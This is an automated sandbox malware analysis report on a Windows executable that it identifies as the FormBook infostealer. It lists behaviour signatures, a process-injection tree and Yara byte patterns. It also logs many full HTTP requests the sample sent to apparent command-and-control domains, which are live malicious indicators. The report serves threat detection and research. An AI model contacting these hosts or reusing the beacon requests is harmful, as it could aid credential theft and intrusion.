Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO2024033194.exe

Overview

General Information

Sample name:PO2024033194.exe
Analysis ID:1515416
MD5:1eebf0360b466749cd46f9d7971c35cd
SHA1:563fe4fd1b3ff569adfe99ad15791e78a09c486f
SHA256:59965600d8885fbd982a88ecf800b6a8cf6714fff11fcbe5123a7fc72781cf23
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO2024033194.exe (PID: 5032 cmdline: "C:\Users\user\Desktop\PO2024033194.exe" MD5: 1EEBF0360B466749CD46F9D7971C35CD)
    • svchost.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\PO2024033194.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • drBzjAnGBElC.exe (PID: 4508 cmdline: "C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 5168 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • firefox.exe (PID: 6080 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.390000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.390000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x172c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.390000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.390000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e3f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x164c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO2024033194.exe", CommandLine: "C:\Users\user\Desktop\PO2024033194.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2024033194.exe", ParentImage: C:\Users\user\Desktop\PO2024033194.exe, ParentProcessId: 5032, ParentProcessName: PO2024033194.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO2024033194.exe", ProcessId: 3492, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO2024033194.exe", CommandLine: "C:\Users\user\Desktop\PO2024033194.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2024033194.exe", ParentImage: C:\Users\user\Desktop\PO2024033194.exe, ParentProcessId: 5032, ParentProcessName: PO2024033194.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO2024033194.exe", ProcessId: 3492, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PO2024033194.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: PO2024033194.exeReversingLabs: Detection: 68%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO2024033194.exeJoe Sandbox ML: detected
            Source: PO2024033194.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2272256633.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2240619932.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000003.2210655063.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2272256633.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2240619932.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000003.2210655063.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: drBzjAnGBElC.exe, 00000003.00000000.2188627925.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO2024033194.exe, 00000000.00000003.2152209643.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PO2024033194.exe, 00000000.00000003.2153477802.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171329849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2173389213.0000000003000000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003C1E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2272345888.000000000372B000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003A80000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2274426157.00000000038D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO2024033194.exe, 00000000.00000003.2152209643.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PO2024033194.exe, 00000000.00000003.2153477802.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2171329849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2173389213.0000000003000000.00000004.00000020.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000002.4625999539.0000000003C1E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2272345888.000000000372B000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003A80000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2274426157.00000000038D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000005D9C000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000040AC000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2571131599.0000000021F5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000005D9C000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000040AC000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2571131599.0000000021F5C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0323C230 FindFirstFileW,FindNextFileW,FindClose,4_2_0323C230
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 4x nop then xor eax, eax3_2_081E8D0F
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 4x nop then pop edi3_2_081E37FB
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax4_2_03229AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then mov ebx, 00000004h4_2_038704E8

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.moritynomxd.xyz
            Source: DNS query: www.sterkus.xyz
            Source: DNS query: www.rtpngk.xyz
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: Joe Sandbox ViewIP Address: 81.2.196.19 81.2.196.19
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.moritynomxd.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.kovallo.cloudUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /becc/?azq=fdKL&i4fTbV=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1rIFAvnCnNucMsmrQXs06QWDt4JmjDj2SCXWkqqyO9GVL4EIVQqM= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.sppsuperplast.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /fl4z/?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.tracy.clubUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /ha8h/?i4fTbV=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX61WMZ5CKSP5Ywj/pBJKYAqDUZeWyiIAYv47gxX4Wz9AjmXGPf0TM=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.sterkus.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /xx1z/?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.syncnodex.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /lbpf/?azq=fdKL&i4fTbV=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK96Mq7ReyrRgsD03neHbuXRNiEyhMf3k5eUDWFdm02mW+aOnIw8Rk= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.galaxyslot88rtp.latUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kzas/?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.warriorsyndrome.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /uxh9/?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.ks1x7i.vipUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /ml5l/?i4fTbV=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7gZ0oLWeUJsJ7Z2tBEY1sQX9lUVfuGDuLcfeu3lFclf66FPfUGcc=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.pakmartcentral.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /74ou/?i4fTbV=3mmMrs1mHi0xtqaDMxx5sGmAfYwz3fKeAP6hfCImDXgoS2DvTlMdmK0EBclDVq+276a7o9Kf0aGsTEl5XVQUxBF2OIg1GqwvGg+sN+gOtZPXTMPeHtLoUfm2FHWRrzdI/h6GADA=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.les-massage.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /876i/?i4fTbV=Kmyw+GmuH5iWde8Ln9Oic9mBBukDH7X+neEL39Fbw9B5TSRbsYx5ep9OaSlRgrfJ9t7osQY2p6mHYTWDA9JvWsELiS8f9ArZa8bqi05RWv7nbhrshbpVBxpFhG8DfoS8KPtDMCA=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.rtpngk.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /i557/?azq=fdKL&i4fTbV=r5xTDTq+P/dmGc23aTYP++6vD4IIXl1qT9Awk095V47k3JGT99IqetoKvxAOeL2EPogdFWvWqA7DbFw7qeor8ymW97eZJYTdZjDdM43a/Prut01z/AyWNItbEAzthb57mHY0hv0= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.wcq24.topUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /4hfb/?i4fTbV=p0fiPEbR7h0D1ZUOfVsjdEWFV3Vqdd7ztt+ba1ipU50QpLeGbsfhVX/xlcry6cJcaLbXkWa/uL73QIBTv0okvOs18q2MWzQBAuyEy9gJ3iqXHcMZDpxJS19wj2EcV+2vhba8AVQ=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.cc101.proUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /bf6k/?i4fTbV=WmuOVz+RC0WxuKvAKjLazsuJSut05UnIYH9cvZCoa2K6/WBiXNRHwXvjS8aBoIFx3RUgrEeQYXBh1DGCvEwoQM3mycAsC54rxjYGxDtBM8eA6E3stZW6KS9LpBS51Lfr66nx40w=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.asociacia.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.deefbank.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.moritynomxd.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.kovallo.cloudUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kovallo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.sppsuperplast.online
            Source: global trafficDNS traffic detected: DNS query: www.tracy.club
            Source: global trafficDNS traffic detected: DNS query: www.sterkus.xyz
            Source: global trafficDNS traffic detected: DNS query: www.syncnodex.net
